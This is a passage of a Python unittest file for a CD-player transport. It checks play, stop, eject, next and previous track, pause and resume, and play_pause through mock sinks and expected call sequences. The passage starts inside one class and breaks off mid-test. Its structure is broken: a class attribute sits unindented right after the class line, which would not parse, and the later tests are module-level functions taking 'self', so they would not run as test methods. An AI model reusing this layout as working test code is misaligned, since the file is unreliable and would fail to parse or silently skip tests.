    def publish_state(self, state):
        # Forward to the TestPublisher so tests can synchronise on updates.
        self._publisher.update_state(state)

    def publish_disc(self, disc):
        # Disc announcements are irrelevant to these tests.
        pass

    # Alias: transport code may call self.debug(...) like log(...).
    # NOTE: inside this class body the name `debug` refers to this method
    # alias, shadowing the module-level `debug` string.
    debug = log
    # No configuration object needed for the tests.
    cfg = None
def create_transport(test, sink):
    """Wire a Transport to test doubles; return (transport, publisher)."""
    state_publisher = TestPublisher(test)
    dummy_player = DummyPlayer(test, state_publisher)
    transport = player.Transport(dummy_player, sink)
    return transport, state_publisher
# Actual test cases follow
class TestTransport(unittest.TestCase):
longMessage = True
    def test_working_play_stop_at_end(self):
        """Play a three-packet disc to the end: the transport should go
        WORKING -> PLAY, advance the position as packets report played,
        drain the sink, and finish in STOP with the state reset."""

        # Single track with three packets
        src = DummySource('disc1', 1, 3)

        # Delay one packet at a time in a dummy buffer
        buf = []

        # Wait for test to finish on an event
        done = threading.Event()

        expects = DummySink(
            self,
            Expect('start', 'should call start on new disc',
                   checks = lambda format: (
                       self.assertIs(format, model.PCM),
                       self.assertIs(t.state.state, player.State.WORKING,
                                     'state should be WORKING before any packets have been read'),
                       self.assertEqual(t.state.track, 1, 'should start playing first track'),
                   ),
                   ),
            Expect('add_packet', 'should add first packet',
                   checks = lambda packet, offset: (
                       self.assertEqual(packet.track_number, 0, 'should be first track record'),
                       self.assertEqual(packet.track.number, 1, 'should be first track number'),
                       self.assertEqual(packet.abs_pos, 0, 'should be first packet'),
                       self.assertEqual(offset, 0),
                       self.assertIs(t.state.state, player.State.PLAY,
                                     'state should set by Transport before getting update from sink'),
                       self.assertEqual(t.state.disc_id, 'disc1'),
                       self.assertEqual(t.state.no_tracks, 1),
                       self.assertEqual(t.state.length, src.TRACK_LENGTH_SECS),
                       self.assertEqual(t.state.track, 1),
                       self.assertEqual(t.state.position, 0),

                       # buffer the packet
                       buf.append(packet),
                   ),
                   # Whole packet accepted, nothing playing yet
                   ret = lambda packet, offset: (len(packet.data), None, None),
                   ),
            Expect('add_packet', 'should add second packet',
                   checks = lambda packet, offset: (
                       self.assertEqual(packet.abs_pos, 1 * model.PCM.rate, 'should be second packet'),
                       self.assertEqual(offset, 0),
                       self.assertIs(t.state.state, player.State.PLAY),
                       self.assertEqual(t.state.position, 0,
                                        'state should not have been updated yet'),

                       # buffer the packet
                       buf.append(packet),
                   ),
                   # Return first packet as being played
                   ret = lambda packet, offset: (len(packet.data), buf.pop(0), None),
                   ),
            Expect('add_packet', 'should add third packet',
                   checks = lambda packet, offset: (
                       self.assertEqual(packet.abs_pos, 2 * model.PCM.rate, 'should be third packet'),
                       self.assertEqual(offset, 0),
                       self.assertIs(t.state.state, player.State.PLAY),
                       self.assertEqual(t.state.position, 0,
                                        'state should show first packet'),

                       # buffer the packet
                       buf.append(packet),
                   ),
                   # Return second packet as being played
                   ret = lambda packet, offset: (len(packet.data), buf.pop(0), None),
                   ),
            Expect('drain', 'should be draining buffered packet',
                   checks = lambda: (
                       self.assertIs(t.state.state, player.State.PLAY),
                       self.assertEqual(t.state.position, 1,
                                        'state should show second packet'),
                   ),
                   # Return third packet as being played, but keep in buffer
                   ret = lambda: (buf[0], None),
                   ),
            Expect('drain', 'should be draining still buffered packet',
                   checks = lambda: (
                       self.assertIs(t.state.state, player.State.PLAY),
                       self.assertEqual(t.state.position, 2,
                                        'state should show third packet'),
                   ),
                   # Return third packet as being played and empty buffer
                   ret = lambda: (buf.pop(0), None),
                   ),
            Expect('drain', 'final call to be notified that draining is done',
                   checks = lambda: (
                       self.assertIs(t.state.state, player.State.PLAY),
                       self.assertEqual(t.state.position, 2,
                                        'state should show third packet'),

                       # Allow test to detect that state has updated
                       p.clear(),
                   ),
                   # Tell transport that buffer is empty
                   ret = lambda: None,
                   ),
            Expect('stop', 'should call stop at end of disc',
                   checks = lambda: (
                       # Allow test case to sync the end of the test
                       done.set(),
                   ),
                   ),
        )

        # Kick off test and wait for it
        t, p = create_transport(self, expects)
        t.new_source(src)
        self.assertTrue(done.wait(5), 'timeout waiting for test to finish')
        self.assertTrue(p.wait(5), 'timeout waiting for state to update')

        # Check final state
        expects.done()
        self.assertEqual(t.state.state, player.State.STOP,
                         'transport should stop at end of disc')
        self.assertEqual(t.state.length, 0)
        self.assertEqual(t.state.track, 0)
        self.assertEqual(t.state.position, 0)
    def test_writing_partial_packet(self):
        """A sink that accepts only part of a packet must get the remainder
        in a follow-up add_packet call with the matching byte offset."""

        # Single track with single packet
        src = DummySource('disc1', 1, 1)

        # Wait for test to finish on an event
        done = threading.Event()

        expects = DummySink(
            self,
            Expect('start', 'should call start on new disc',
                   checks = lambda format: (
                       self.assertIs(format, model.PCM),
                       self.assertIs(t.state.state, player.State.WORKING,
                                     'state should be WORKING before any packets have been read'),
                   ),
                   ),
            Expect('add_packet', 'should add first packet',
                   checks = lambda packet, offset: (
                       self.assertEqual(offset, 0),
                   ),
                   # Simulate the sink accepting only the first 4 bytes
                   ret = lambda packet, offset: (4, packet, None),
                   ),
            Expect('add_packet', 'should remaining bytes in first packet',
                   checks = lambda packet, offset: (
                       self.assertEqual(offset, 4),
                   ),
                   # Accept the rest of the packet this time
                   ret = lambda packet, offset: (len(packet.data) - 4, packet, None),
                   ),
            Expect('drain', 'final call to be notified that draining is done',
                   checks = lambda: (
                       # Allow test to detect that state has updated
                       p.clear(),
                   ),
                   # Tell transport that buffer is empty
                   ret = lambda: None,
                   ),
            Expect('stop', 'should call stop at end of disc',
                   checks = lambda: (
                       # Allow test case to sync the end of the test
                       done.set(),
                   ),
                   ),
        )

        # Kick off test and wait for it
        t, p = create_transport(self, expects)
        t.new_source(src)
        self.assertTrue(done.wait(5), 'timeout waiting for test to finish')
        self.assertTrue(p.wait(5), 'timeout waiting for state to update')

        # Check final state
        expects.done()
        self.assertEqual(t.state.state, player.State.STOP,
                         'transport should stop at end of disc')
    def test_stopping(self):
        """Calling t.stop() during playback disruptively resets the state
        to STOP at once and tells the sink to stop."""

        # Single track with lots of packets
        src = DummySource('disc1', 1)

        # Wait for test to finish on an event
        done = threading.Event()

        expects = DummySink(
            self,
            Expect('start', 'should call start on new disc',
                   checks = lambda format: (
                       self.assertIs(format, model.PCM),
                       self.assertIs(t.state.state, player.State.WORKING,
                                     'state should be WORKING before any packets have been read'),
                   ),
                   ),
            Expect('add_packet', 'should add first packet',
                   checks = lambda packet, offset: (
                       self.assertIs(t.state.state, player.State.PLAY,
                                     'state should be PLAY when we stop()'),

                       # Allow test to detect that state has updated
                       p.clear(),

                       # Tell the transport to stop
                       t.stop(),

                       self.assertIs(t.state.state, player.State.STOP,
                                     'state should be STOP immediately, since this is a disruptive change'),
                       self.assertEqual(t.state.length, 0),
                       self.assertEqual(t.state.track, 0),
                       self.assertEqual(t.state.position, 0),
                   ),
                   ret = lambda packet, offset: (len(packet.data), packet, None),
                   ),
            Expect('stop', 'should be told to stop by transport',
                   checks = lambda: (
                       # Allow test case to sync the end of the test
                       done.set(),
                   ),
                   ),
        )

        # Kick off test and wait for it
        t, p = create_transport(self, expects)
        t.new_source(src)
        self.assertTrue(done.wait(5), 'timeout waiting for test to finish')
        self.assertTrue(p.wait(5), 'timeout waiting for second run state to update')

        # Check final state
        expects.done()
        self.assertEqual(t.state.state, player.State.STOP)
    def test_eject(self):
        """Calling t.eject() during playback disruptively resets the state
        to NO_DISC (clearing all disc info) and tells the sink to stop."""

        # Single track with lots of packets
        src = DummySource('disc1', 1)

        # Wait for test to finish on an event
        done = threading.Event()

        expects = DummySink(
            self,
            Expect('start', 'should call start on new disc',
                   checks = lambda format: (
                       self.assertIs(format, model.PCM),
                       self.assertIs(t.state.state, player.State.WORKING,
                                     'state should be WORKING before any packets have been read'),
                   ),
                   ),
            Expect('add_packet', 'should add first packet',
                   checks = lambda packet, offset: (
                       self.assertIs(t.state.state, player.State.PLAY,
                                     'state should be PLAY when we stop()'),

                       # Allow test to detect that state has updated
                       p.clear(),

                       # Tell the transport to eject the disc
                       t.eject(),

                       self.assertIs(t.state.state, player.State.NO_DISC,
                                     'state should be NO_DISC immediately, since this is a disruptive change'),
                       self.assertEqual(t.state.disc_id, None),
                       self.assertEqual(t.state.no_tracks, 0),
                       self.assertEqual(t.state.length, 0),
                       self.assertEqual(t.state.track, 0),
                       self.assertEqual(t.state.position, 0),
                   ),
                   ret = lambda packet, offset: (len(packet.data), packet, None),
                   ),
            Expect('stop', 'should be told to stop by transport',
                   checks = lambda: (
                       # Allow test case to sync the end of the test
                       done.set(),
                   ),
                   ),
        )

        # Kick off test and wait for it
        t, p = create_transport(self, expects)
        t.new_source(src)
        self.assertTrue(done.wait(5), 'timeout waiting for test to finish')
        self.assertTrue(p.wait(5), 'timeout waiting for second run state to update')

        # Check final state
        expects.done()
        self.assertEqual(t.state.state, player.State.NO_DISC)
    def test_stop_at_end_and_play_again(self):
        """After a disc plays to the end and stops, t.play() must restart it
        from the first track through the same start/add/drain/stop cycle."""

        # Single track with single packet
        src = DummySource('disc1', 1, 1)

        # Wait for test to finish on an event
        done = threading.Event()

        expects = DummySink(
            self,
            Expect('start', 'should call start on new disc',
                   checks = lambda format: (
                       self.assertIs(format, model.PCM),
                       self.assertIs(t.state.state, player.State.WORKING,
                                     'state should be WORKING before any packets have been read'),
                   ),
                   ),
            Expect('add_packet', 'should add only packet',
                   checks = lambda packet, offset: (
                       self.assertEqual(offset, 0),
                   ),
                   ret = lambda packet, offset: (len(packet.data), packet, None),
                   ),
            Expect('drain', 'final call to be notified that draining is done',
                   checks = lambda: (
                       # Allow test to detect that state has updated
                       p.clear(),
                   ),
                   # Tell transport that buffer is empty
                   ret = lambda: None,
                   ),
            Expect('stop', 'should call stop at end of disc',
                   checks = lambda: (
                       # Allow test case to sync the middle of the test
                       done.set(),
                   ),
                   ),
            # Second run: the same sequence after t.play() below
            Expect('start', 'should call start on play',
                   checks = lambda format: (
                       self.assertIs(format, model.PCM),
                       self.assertIs(t.state.state, player.State.WORKING,
                                     'state should be WORKING before any packets have been read'),
                       self.assertEqual(t.state.track, 1, 'should start playing first track'),
                   ),
                   ),
            Expect('add_packet', 'should add only packet',
                   checks = lambda packet, offset: (
                       self.assertEqual(offset, 0),
                   ),
                   ret = lambda packet, offset: (len(packet.data), packet, None),
                   ),
            Expect('drain', 'final call to be notified that draining is done',
                   checks = lambda: (
                       # Allow test to detect that state has updated
                       p.clear(),
                   ),
                   # Tell transport that buffer is empty
                   ret = lambda: None,
                   ),
            Expect('stop', 'should call stop at end of disc',
                   checks = lambda: (
                       # Allow test case to sync the end of the test
                       done.set(),
                   ),
                   ),
        )

        # Kick off test and wait for it
        t, p = create_transport(self, expects)
        t.new_source(src)
        self.assertTrue(done.wait(5), 'timeout waiting for first run to finish')
        self.assertTrue(p.wait(5), 'timeout waiting for first run state to update')

        self.assertEqual(t.state.state, player.State.STOP,
                         'transport should stop at end of disc')

        # Now play it again
        done.clear()
        t.play()

        # Wait for second run to finish
        self.assertTrue(done.wait(5), 'timeout waiting for second run to finish')
        self.assertTrue(p.wait(5), 'timeout waiting for second run state to update')

        # Check final state
        expects.done()
        self.assertEqual(t.state.state, player.State.STOP,
                         'transport should stop at end of disc')
def test_stopping_and_play_again(self):
    """Stop playback mid-track, then play() again.

    The transport should go to STOP immediately on stop(), and a later
    play() should restart the same disc from the first track, calling
    start()/add_packet()/stop() on the sink a second time.
    """
    # Single track with lots of packets
    src = DummySource('disc1', 1)
    # Wait for test to finish on an event
    done = threading.Event()
    expects = DummySink(
        self,
        Expect('start', 'should call start on new disc',
            checks = lambda format: (
                self.assertIs(format, model.PCM),
                self.assertIs(t.state.state, player.State.WORKING,
                    'state should be WORKING before any packets have been read'),
            ),
        ),
        Expect('add_packet', 'should add first packet',
            checks = lambda packet, offset: (
                self.assertEqual(packet.track_number, 0, 'should be first track record'),
                self.assertEqual(packet.track.number, 1, 'should be first track number'),
                self.assertIs(t.state.state, player.State.PLAY,
                    'state should be PLAY when we stop()'),
                # Tell the transport to stop
                t.stop(),
                self.assertIs(t.state.state, player.State.STOP,
                    'state should be STOP immediately, since this is a disruptive change'),
                self.assertEqual(t.state.length, 0),
                self.assertEqual(t.state.track, 0),
                self.assertEqual(t.state.position, 0),
            ),
            ret = lambda packet, offset: (len(packet.data), packet, None),
        ),
        Expect('stop', 'should be told to stop by transport',
            checks = lambda: (
                # Allow test case to sync the end of the test
                done.set(),
            ),
        ),
        Expect('start', 'should call start on playing disc again',
            checks = lambda format: (
                self.assertIs(format, model.PCM),
                self.assertIs(t.state.state, player.State.WORKING,
                    'state should be WORKING before any packets have been read'),
                self.assertEqual(t.state.track, 1, 'should start playing first track'),
            ),
        ),
        Expect('add_packet', 'should add first packet',
            checks = lambda packet, offset: (
                self.assertEqual(packet.track_number, 0, 'should be first track record'),
                self.assertEqual(packet.track.number, 1, 'should be first track number'),
                self.assertIs(t.state.state, player.State.PLAY,
                    'state should be PLAY when we stop()'),
                # Allow test to detect that state has updated
                p.clear(),
                # Tell the transport to stop
                t.stop(),
                self.assertIs(t.state.state, player.State.STOP,
                    'state should be STOP immediately, since this is a disruptive change'),
                self.assertEqual(t.state.length, 0),
                self.assertEqual(t.state.track, 0),
                self.assertEqual(t.state.position, 0),
            ),
            ret = lambda packet, offset: (len(packet.data), packet, None),
        ),
        Expect('stop', 'should be told to stop by transport',
            checks = lambda: (
                # Allow test case to sync the end of the test
                done.set(),
            ),
        ),
    )
    # Kick off test and wait for it
    t, p = create_transport(self, expects)
    t.new_source(src)
    self.assertTrue(done.wait(5), 'timeout waiting for first run to finish')
    # BUGFIX: message said "second run" for the first run's state wait
    self.assertTrue(p.wait(5), 'timeout waiting for first run state to update')
    # Now play it again
    done.clear()
    t.play()
    # Wait for second run to finish
    self.assertTrue(done.wait(5), 'timeout waiting for second run to finish')
    self.assertTrue(p.wait(5), 'timeout waiting for second run state to update')
    # Check final state
    expects.done()
    self.assertEqual(t.state.state, player.State.STOP,
        'transport should stop at end of disc')
def test_new_source_while_playing(self):
    """Switch to a new source while the first disc is playing.

    new_source() while in PLAY is a disruptive change: state flips to
    WORKING immediately, the sink is stopped and restarted, and the
    second disc plays to its end.
    """
    # Single track with lots of packets
    src1 = DummySource('disc1', 1)
    # Single track with one packet
    src2 = DummySource('disc2', 1, 1)
    # Wait for test to finish on an event
    done = threading.Event()
    expects = DummySink(
        self,
        Expect('start', 'should call start on first disc',
            checks = lambda format: (
                self.assertIs(format, model.PCM),
                self.assertIs(t.state.state, player.State.WORKING,
                    'state should be WORKING before any packets have been read'),
                self.assertEqual(t.state.disc_id, 'disc1')
            ),
        ),
        Expect('add_packet', 'should add first packet',
            checks = lambda packet, offset: (
                self.assertIs(t.state.state, player.State.PLAY,
                    'state should be PLAY when we change the disc'),
                # Tell the transport to switch to the next source
                t.new_source(src2),
                self.assertIs(t.state.state, player.State.WORKING,
                    'state should be WORKING immediately, since this is a disruptive change'),
                self.assertEqual(t.state.disc_id, 'disc2'),
                self.assertEqual(t.state.no_tracks, 1),
                self.assertEqual(t.state.track, 1, 'should start playing first track'),
                self.assertEqual(t.state.position, 0),
            ),
            ret = lambda packet, offset: (len(packet.data), packet, None),
        ),
        Expect('stop', 'should be told to stop by transport on changing disc'),
        Expect('start', 'should call start on second disc',
            checks = lambda format: (
                self.assertIs(format, model.PCM),
                self.assertIs(t.state.state, player.State.WORKING,
                    'state should be WORKING before any packets have been read'),
                self.assertEqual(t.state.track, 1, 'should start playing first track'),
                self.assertEqual(t.state.disc_id, 'disc2')
            ),
        ),
        Expect('add_packet', 'should add only packet',
            checks = lambda packet, offset: (
                self.assertEqual(offset, 0),
            ),
            ret = lambda packet, offset: (len(packet.data), packet, None),
        ),
        Expect('drain', 'final call to be notified that draining is done',
            checks = lambda: (
                # Allow test to detect that state has updated
                p.clear(),
            ),
            # Tell transport that buffer is empty
            ret = lambda: None,
        ),
        Expect('stop', 'should call stop at end of disc',
            checks = lambda: (
                # Allow test case to sync the middle of the test
                done.set(),
            ),
        ),
    )
    # Kick off test and wait for it
    t, p = create_transport(self, expects)
    t.new_source(src1)
    self.assertTrue(done.wait(5), 'timeout waiting for test to finish')
    # BUGFIX: message said "second run" but this test has a single run
    self.assertTrue(p.wait(5), 'timeout waiting for state to update')
    # Check final state
    expects.done()
    self.assertEqual(t.state.state, player.State.STOP)
    self.assertEqual(t.state.disc_id, 'disc2')
def test_next_track(self):
    """next() mid-track should jump to the next track; next() on the
    last track should stop the transport.

    Uses a two-track disc; the sink is stopped and restarted on the
    track switch, and the transport ends in STOP after the second
    next() runs off the end of the disc.
    """
    # Two tracks with two packets each
    src = DummySource('disc1', 2, 2)
    # Wait for test to finish on an event
    done = threading.Event()
    expects = DummySink(
        self,
        Expect('start', 'should call start on new disc',
            checks = lambda format: (
                self.assertIs(format, model.PCM),
                self.assertIs(t.state.state, player.State.WORKING,
                    'state should be WORKING before any packets have been read'),
                self.assertEqual(t.state.track, 1, 'should start playing first track'),
            ),
        ),
        Expect('add_packet', 'should add first packet of first track',
            checks = lambda packet, offset: (
                self.assertEqual(packet.track_number, 0, 'should be first track record'),
                self.assertEqual(packet.track.number, 1, 'should be first track number'),
                self.assertIs(t.state.state, player.State.PLAY,
                    'state should be PLAY when we next()'),
                # Tell the transport to move to the next track
                t.next(),
                self.assertIs(t.state.state, player.State.WORKING,
                    'state should be WORKING while waiting for next track to start'),
                self.assertEqual(t.state.track, 2, 'track should be updated'),
                self.assertEqual(t.state.position, 0),
            ),
            ret = lambda packet, offset: (len(packet.data), packet, None),
        ),
        Expect('stop', 'should be told to stop by transport on switching track',
            checks = lambda: (
                self.assertIs(t.state.state, player.State.PLAY,
                    'state should still be PLAY, since this is called within next()'),
                self.assertEqual(t.state.track, 1, 'track should still be the first track'),
                self.assertEqual(t.state.position, 0),
            ),
        ),
        Expect('start', 'should call start for new track',
            checks = lambda format: (
                self.assertIs(format, model.PCM),
                self.assertIs(t.state.state, player.State.WORKING,
                    'state should still be WORKING while waiting for next track to start'),
                self.assertEqual(t.state.track, 2, 'track should still be the pending track'),
                self.assertEqual(t.state.position, 0),
            ),
        ),
        Expect('add_packet', 'should add first packet of second track',
            checks = lambda packet, offset: (
                self.assertEqual(packet.track_number, 1, 'should be second track record'),
                self.assertEqual(packet.track.number, 2, 'should be second track number'),
                self.assertIs(t.state.state, player.State.PLAY,
                    'state should be PLAY when we next()'),
                # Allow test to detect that state has updated
                p.clear(),
                # Tell the transport to move to the next track (which will stop)
                t.next(),
                self.assertIs(t.state.state, player.State.STOP,
                    'state should be STOP since there are no more tracks'),
                self.assertEqual(t.state.track, 0, 'track should be updated'),
                self.assertEqual(t.state.position, 0),
            ),
            ret = lambda packet, offset: (len(packet.data), packet, None),
        ),
        Expect('stop', 'should call stop at end of disc',
            checks = lambda: (
                # Allow test case to sync the middle of the test
                done.set(),
            ),
        ),
    )
    # Kick off test and wait for it
    t, p = create_transport(self, expects)
    t.new_source(src)
    self.assertTrue(done.wait(5), 'timeout waiting for test to finish')
    # BUGFIX: message said "second run" but this test has a single run
    self.assertTrue(p.wait(5), 'timeout waiting for state to update')
    # Check final state
    expects.done()
    self.assertEqual(t.state.state, player.State.STOP)
def test_prev_track(self):
    """prev() behavior: restart current track when past its start,
    jump to the previous track when at its start, and stop when
    prev() is issued at the very start of the disc.

    Starts playback on the second track of a two-track disc (four
    packets per track, so the position counter is past 0 when the
    first prev() is issued).
    """
    # Two tracks with four packets each, to be able to test restarting track
    src = DummySource('disc1', 2, 4)
    # Wait for test to finish on an event
    done = threading.Event()
    expects = DummySink(
        self,
        Expect('start', 'should call start on new disc',
            checks = lambda format: (
                self.assertIs(format, model.PCM),
                self.assertIs(t.state.state, player.State.WORKING,
                    'state should be WORKING before any packets have been read'),
                self.assertEqual(t.state.track, 2, 'should start playing second track'),
            ),
        ),
        Expect('add_packet', 'should add first packet of second track',
            checks = lambda packet, offset: (
                self.assertEqual(packet.abs_pos, 0, 'should be first packet'),
                self.assertEqual(packet.track_number, 1, 'should be second track record'),
                self.assertEqual(packet.track.number, 2, 'should be second track number'),
                self.assertIs(t.state.state, player.State.PLAY,
                    'state should be PLAY when starting to play track'),
                self.assertEqual(t.state.position, 0, 'should start playing from start of track'),
            ),
            ret = lambda packet, offset: (len(packet.data), packet, None),
        ),
        Expect('add_packet', 'should add second packet of second track',
            checks = lambda packet, offset: (
                self.assertEqual(packet.abs_pos, 1 * model.PCM.rate, 'should be second packet'),
                self.assertEqual(t.state.position, 0, 'position should still be first packet'),
            ),
            ret = lambda packet, offset: (len(packet.data), packet, None),
        ),
        Expect('add_packet', 'should add third packet of second track',
            checks = lambda packet, offset: (
                self.assertEqual(packet.abs_pos, 2 * model.PCM.rate, 'should be third packet'),
                self.assertEqual(t.state.position, 1, 'position should be second packet'),
            ),
            ret = lambda packet, offset: (len(packet.data), packet, None),
        ),
        Expect('add_packet', 'should add fourth packet of second track',
            checks = lambda packet, offset: (
                self.assertEqual(packet.abs_pos, 3 * model.PCM.rate, 'should be fourth packet'),
                self.assertIs(t.state.state, player.State.PLAY,
                    'state should be PLAY when we prev()'),
                self.assertEqual(t.state.position, 2, 'position should be third packet when we prev()'),
                # Tell transport to restart from start of the second track
                t.prev(),
                self.assertIs(t.state.state, player.State.WORKING,
                    'state should be WORKING while waiting for track to restart'),
                self.assertEqual(t.state.track, 2, 'should still be the second track'),
                self.assertEqual(t.state.position, 0, 'position should be start of track'),
            ),
            ret = lambda packet, offset: (len(packet.data), packet, None),
        ),
        Expect('stop', 'should be told to stop by transport on switching track',
            checks = lambda: (
                self.assertIs(t.state.state, player.State.PLAY,
                    'state should still be PLAY, since this is called within prev()'),
                self.assertEqual(t.state.track, 2, 'track should still be the second track'),
                self.assertEqual(t.state.position, 2, 'position should still be third packet'),
            ),
        ),
        Expect('start', 'should call start on restart of track',
            checks = lambda format: (
                self.assertIs(format, model.PCM),
                self.assertIs(t.state.state, player.State.WORKING,
                    'state should still be WORKING while waiting for track to restart'),
                self.assertEqual(t.state.track, 2, 'track should still be the second track'),
                self.assertEqual(t.state.position, 0, 'position should still be start of track'),
            ),
        ),
        Expect('add_packet', 'should add first packet of second track',
            checks = lambda packet, offset: (
                self.assertEqual(packet.abs_pos, 0, 'should be first packet'),
                self.assertEqual(packet.track_number, 1, 'should be second track record'),
                self.assertEqual(packet.track.number, 2, 'should be second track number'),
                self.assertIs(t.state.state, player.State.PLAY,
                    'state should be PLAY when we prev()'),
                self.assertEqual(t.state.track, 2, 'track should be the second track when we prev()'),
                # Tell the transport to move to the previous track
                t.prev(),
                self.assertIs(t.state.state, player.State.WORKING,
                    'state should be WORKING while waiting for prev track to start'),
                self.assertEqual(t.state.track, 1, 'should be the first track'),
                self.assertEqual(t.state.position, 0, 'position should be start of track'),
            ),
            ret = lambda packet, offset: (len(packet.data), packet, None),
        ),
        Expect('stop', 'should be told to stop by transport on switching track',
            checks = lambda: (
                self.assertIs(t.state.state, player.State.PLAY,
                    'state should still be PLAY, since this is called within prev()'),
                self.assertEqual(t.state.track, 2, 'track should still be the second track'),
                self.assertEqual(t.state.position, 0, 'position should still be first packet'),
            ),
        ),
        Expect('start', 'should call start on restart of track',
            checks = lambda format: (
                self.assertIs(format, model.PCM),
                self.assertIs(t.state.state, player.State.WORKING,
                    'state should still be WORKING while waiting for track to restart'),
                self.assertEqual(t.state.track, 1, 'track should still be the first track'),
                self.assertEqual(t.state.position, 0, 'position should still be start of track'),
            ),
        ),
        Expect('add_packet', 'should add first packet of first track',
            checks = lambda packet, offset: (
                self.assertEqual(packet.abs_pos, 0, 'should be first packet'),
                self.assertEqual(packet.track_number, 0, 'should be first track record'),
                self.assertEqual(packet.track.number, 1, 'should be first track number'),
                self.assertIs(t.state.state, player.State.PLAY,
                    'state should be PLAY when we prev()'),
                self.assertEqual(t.state.track, 1, 'track should be the first track when we prev()'),
                # Allow test to detect that state has updated
                p.clear(),
                # Tell the transport to move to the previous track, which will stop on start of disc
                t.prev(),
                self.assertIs(t.state.state, player.State.STOP,
                    'state should be STOP since we prev() at start of disc'),
                self.assertEqual(t.state.track, 0, 'track should be updated'),
                self.assertEqual(t.state.position, 0),
            ),
            ret = lambda packet, offset: (len(packet.data), packet, None),
        ),
        Expect('stop', 'should call stop when prev() at start of disc',
            checks = lambda: (
                # Allow test case to sync the middle of the test
                done.set(),
            ),
        ),
    )
    # Kick off test on second track and wait for it
    t, p = create_transport(self, expects)
    t.new_source(src, 1)
    self.assertTrue(done.wait(5), 'timeout waiting for test to finish')
    # BUGFIX: message said "second run" but this test has a single run
    self.assertTrue(p.wait(5), 'timeout waiting for state to update')
    # Check final state
    expects.done()
    self.assertEqual(t.state.state, player.State.STOP)
def test_pause_and_resume(self):
    """pause() then play() mid-track.

    The sink reports that it paused itself (pause() returns True), so
    the transport flips to PAUSE immediately; play() resumes via the
    sink's resume() and playback continues until stop().
    """
    # Single track with lots of packets
    src = DummySource('disc1', 1)
    # Wait for test to finish on an event
    done = threading.Event()
    expects = DummySink(
        self,
        Expect('start', 'should call start on new disc',
            checks = lambda format: (
                self.assertIs(format, model.PCM),
                self.assertIs(t.state.state, player.State.WORKING,
                    'state should be WORKING before any packets have been read'),
            ),
        ),
        Expect('add_packet', 'should add first packet',
            checks = lambda packet, offset: (
                self.assertEqual(packet.abs_pos, 0, 'should be first packet'),
                self.assertIs(t.state.state, player.State.PLAY,
                    'state should be PLAY when we pause()'),
                # Tell the transport to pause
                t.pause(),
                self.assertIs(t.state.state, player.State.PAUSE,
                    'state should be PAUSE immediately, since the sink "paused" itself'),
                self.assertEqual(t.state.position, 0, 'should be paused on first packet'),
            ),
            # Accept packet despite pause - let's pretend it's buffered
            ret = lambda packet, offset: (len(packet.data), packet, None),
        ),
        Expect('pause', 'should be told to pause by transport',
            checks = lambda: (
                self.assertIs(t.state.state, player.State.PLAY,
                    'state should still be PLAY, since this is called within pause()'),
            ),
            # Tell transport that we are "paused"
            ret = lambda: True
        ),
        Expect('add_packet', 'should add second packet while paused',
            checks = lambda packet, offset: (
                self.assertEqual(packet.abs_pos, 1 * model.PCM.rate, 'should be second packet'),
                self.assertIs(t.state.state, player.State.PAUSE),
                # Tell transport to resume again
                t.play(),
                self.assertIs(t.state.state, player.State.PLAY,
                    'state should be PLAY immediately'),
                self.assertEqual(t.state.position, 0, 'position should still be first packet'),
            ),
            ret = lambda packet, offset: (len(packet.data), packet, None),
        ),
        Expect('resume', 'should be told to resume by transport',
            checks = lambda: (
                self.assertIs(t.state.state, player.State.PAUSE,
                    'state should still be PAUSE, since this is called within play()'),
            ),
        ),
        Expect('add_packet', 'should add third packet after resume',
            checks = lambda packet, offset: (
                self.assertEqual(packet.abs_pos, 2 * model.PCM.rate, 'should be third packet'),
                self.assertIs(t.state.state, player.State.PLAY),
                # Allow test to detect that state has updated
                p.clear(),
                # Tell transport to stop the test
                t.stop(),
            ),
            ret = lambda packet, offset: (len(packet.data), packet, None),
        ),
        Expect('stop', 'should be told to stop by transport',
            checks = lambda: (
                # Allow test case to sync the end of the test
                done.set(),
            ),
        ),
    )
    # Kick off test and wait for it
    t, p = create_transport(self, expects)
    t.new_source(src)
    self.assertTrue(done.wait(5), 'timeout waiting for test to finish')
    # BUGFIX: message said "second run" but this test has a single run
    self.assertTrue(p.wait(5), 'timeout waiting for state to update')
    # Check final state
    expects.done()
    self.assertEqual(t.state.state, player.State.STOP)
def test_play_pause_command(self):
    """play_pause() toggling: PLAY -> PAUSE -> PLAY.

    Mirrors test_pause_and_resume but drives both transitions through
    the single play_pause() toggle instead of pause()/play().
    """
    # Single track with lots of packets
    src = DummySource('disc1', 1)
    # Wait for test to finish on an event
    done = threading.Event()
    expects = DummySink(
        self,
        Expect('start', 'should call start on new disc',
            checks = lambda format: (
                self.assertIs(format, model.PCM),
                self.assertIs(t.state.state, player.State.WORKING,
                    'state should be WORKING before any packets have been read'),
            ),
        ),
        Expect('add_packet', 'should add first packet',
            checks = lambda packet, offset: (
                self.assertEqual(packet.abs_pos, 0, 'should be first packet'),
                self.assertIs(t.state.state, player.State.PLAY,
                    'state should be PLAY when we play_pause()'),
                # Tell the transport to toggle into pause
                t.play_pause(),
                self.assertIs(t.state.state, player.State.PAUSE,
                    'state should be PAUSE immediately, since the sink "paused" itself'),
                self.assertEqual(t.state.position, 0, 'should be paused on first packet'),
            ),
            # Accept packet despite pause - let's pretend it's buffered
            ret = lambda packet, offset: (len(packet.data), packet, None),
        ),
        Expect('pause', 'should be told to pause by transport',
            checks = lambda: (
                self.assertIs(t.state.state, player.State.PLAY,
                    'state should still be PLAY, since this is called within play_pause()'),
            ),
            # Tell transport that we are "paused"
            ret = lambda: True
        ),
        Expect('add_packet', 'should add second packet while paused',
            checks = lambda packet, offset: (
                self.assertEqual(packet.abs_pos, 1 * model.PCM.rate, 'should be second packet'),
                self.assertIs(t.state.state, player.State.PAUSE),
                # Tell transport to resume again
                t.play_pause(),
                self.assertIs(t.state.state, player.State.PLAY,
                    'state should be PLAY immediately'),
                self.assertEqual(t.state.position, 0, 'position should still be first packet'),
            ),
            ret = lambda packet, offset: (len(packet.data), packet, None),
        ),
        Expect('resume', 'should be told to resume by transport',
            checks = lambda: (
                self.assertIs(t.state.state, player.State.PAUSE,
                    'state should still be PAUSE, since this is called within play_pause()'),
            ),
        ),
        Expect('add_packet', 'should add third packet after resume',
            checks = lambda packet, offset: (
                self.assertEqual(packet.abs_pos, 2 * model.PCM.rate, 'should be third packet'),
                self.assertIs(t.state.state, player.State.PLAY),
                # Allow test to detect that state has updated
                p.clear(),
                # Tell transport to stop the test
                t.stop(),
            ),
            ret = lambda packet, offset: (len(packet.data), packet, None),
        ),
        Expect('stop', 'should be told to stop by transport',
            checks = lambda: (
